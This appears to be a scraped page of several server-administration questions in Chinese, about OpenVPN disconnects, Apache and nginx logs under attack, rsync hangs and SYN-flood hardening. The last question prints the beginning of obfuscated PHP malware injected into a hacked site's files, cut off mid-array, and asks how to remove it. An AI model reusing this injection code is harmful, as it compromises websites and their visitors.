我的OpenVPN配置有一个相当奇怪的问题。我正在从Windows 7官方最新客户端连接OpenVPN到我的OpenVPN服务器 ( OpenVPN 2.1.4 i386-redhat-linux-gnu)。
问题是我OpenVPN刚好在 1 小时后与服务器断开连接,我无法理解什么指令/选项对此负责。可能是客户端的问题?我尝试了不同的Windows系统和Windows VPN客户端。该Linux客户是否按预期工作,没有断开。
你能帮我解决这个问题吗?我曾尝试阅读的书籍和谷歌搜索,有些人建议玩keepalive和reneg-sec指令。但这似乎没有帮助。
OpenVPN 服务器配置
port 1194
proto udp
dev tun
ca ca.crt
cert server.crt
key server.key
dh dh1024.pem
server 192.168.2.0 255.255.255.0
ifconfig-pool-persist ipp.txt
push "route 10.0.0.0 255.0.0.0"
client-config-dir ccd
route 192.168.51.0 255.255.255.0
keepalive 60 600
reneg-sec 5000
hand-window 15
tls-auth ta.key 0
comp-lzo
max-clients 50
user nobody
group nobody
persist-key …在我的 Apache 访问日志中,我有超过 1000 万个这样的查询:
::1 - - [21/Nov/2011:16:15:54 +0000] "OPTIONS * HTTP/1.0" 200 - "-" "Apache/2.2.15 (Unix) PHP/5.2.13 (internal dummy connection)"
是因为 mod_rewrite 重定向还是什么?为什么它们以 IPv6 表示法显示?如果您需要有关服务器配置的更多信息,请告诉我。我使用 Debian 5.0。
我的服务器受到严重攻击。大多数请求都是这样来的:
46.43.84.214 - - [15/May/2012:11:21:45 +0400] "GET / HTTP/1.0" 200 65859 "2r4k68998q24ay.ru" "Mozilla/4.0 (compatible; MSIE 4.01; Vonna.com b o t)"
所有此类请求的 HTTP 协议版本都相同。我可以以某种方式在 Web 服务器级别阻止 HTTP 1.0 请求吗?我试过这个来消除攻击(重定向到一个空文件):
if ($server_protocol ~* "HTTP/1.0") {
rewrite ^/ http://example.com/white.txt;
}
似乎没有多大帮助,我在日志中没有看到任何此类重定向。我使用 nginx 1.0.9 作为 Apache 2.2.3 的反向代理。
任何帮助表示赞赏。
我是一名 Linux 系统管理员,我想为开源做出贡献,以获取新技能并在可能的情况下帮助其他人。我发现了这个SF 问题,并在谷歌上搜索了如何加入 CentOS 或 Snort 基础架构团队,但没有成功。更喜欢成为一名程序员,为开源做出贡献。
有人可以帮助了解如何开始以及我应该学习什么作为系统管理员参与项目吗?
我的 Apache 访问日志中有很多以下 HTTP 请求:
178.91.64.43 - - [17/May/2012:16:33:22 +0400] "\x80z\x01\x03\x01" 200 65900 "-" "-"
我的网站因为它们而停止工作。所以,我只是用我的 csf 防火墙阻止了所有这些 IP。我在 CentOS 5.8 上使用 Apache 2.2.4。
你能帮我理解这些请求是什么吗?我无法用谷歌搜索任何东西,只需要一个起点来解决这个问题。
谢谢你。
更新。
Web 服务器正在侦听端口 443。
tcp 0 0 :::443 :::* LISTEN 0 2686146530 19775/httpd
我遇到了一个奇怪的问题。我通常用来rsync在服务器之间同步文件,但现在这个实用程序的行为方式很奇怪。
首先,这是我使用的命令:
server1# rsync -av -e ssh ./server1_dir/ root@192.168.1.1:/server2_dir/
它按应有的方式启动同步过程,但没有同步任何文件,仅同步目录。实际上并非所有目录,因为rsync进程挂起很长时间导致超时错误。
如果我终止该进程并再次尝试,它根本不会启动。我看到的唯一消息:
sending incremental file list
第一个想法是——防火墙。但两台服务器都没有安装它。我什至尝试过手动编译最新rsync版本,但没有成功。
有人可以帮我解决这个问题吗?非常感谢。
更新。server1 上的 strace 输出
root@server1 [~]# ps auxf|grep [r]sync
root 13958 0.0 0.0 70676 1232 pts/0 S+ 23:29 0:00 | \_ rsync -avv -e ssh directory1 root@192.168.1.1:/home
root 13959 0.0 0.2 58436 3256 pts/0 S+ 23:29 0:00 | \_ ssh -l root 192.168.1.1 rsync --server -vvlogDtpre.isf . /root
root@server1 [~]# strace -p 13959
Process 13959 attached …我读过一篇关于如何通过修改sysctl.conf. 那篇文章有这样一句话:“可以使用一些选项重新编译内核以提高对 SYN 洪水的防护”。如果我的问题太笼统,我很抱歉,但您能否向我指出它可能指的是哪些内核选项?我下载了内核并查看了所有网络选项,make menuconfig但没有找到或错过了这些选项。谷歌搜索也没有帮助。
谢谢。
可能重复:
我的服务器被黑了 紧急情况
你好,
我迫切需要您的帮助,因为服务器已被黑客入侵,而且我没有时间学习如何从所有文件中删除黑客的代码。我附上了添加到所有文件的代码。这段代码中有很多特殊字符,而且相当大。它有时会两次添加到文件中。
我不知道 sed 能很好地解决这个问题。如何从所有文件中排除这段代码?使用 sed、diff/patch 或其他技术?
这是要删除的部分代码:
<?php global $ob_starting;
if(!$ob_starting) {
function ob_start_flush($s) {
$tc = array(0, 69, 83, 84, 82, 67, 7, 79, 9, 8, 23, 73, 12, 76, 68, 78, 63, 24, 14, 19, 3, 65, 27, 17, 85, 70, 80, 16, 29, 11, 89, 86, 2, 66, 77, 93, 91, 71, 18, 72, 20, 75, 87, 22, 74, 13, 59, 61, 52, 37, 28, 35, 15, 1, 21, 25, 34, 92, 36, …apache-2.2 ×2
bash ×1
ddos ×1
kernel ×1
linux ×1
nginx ×1
open-source ×1
openvpn ×1
rsync ×1
sed ×1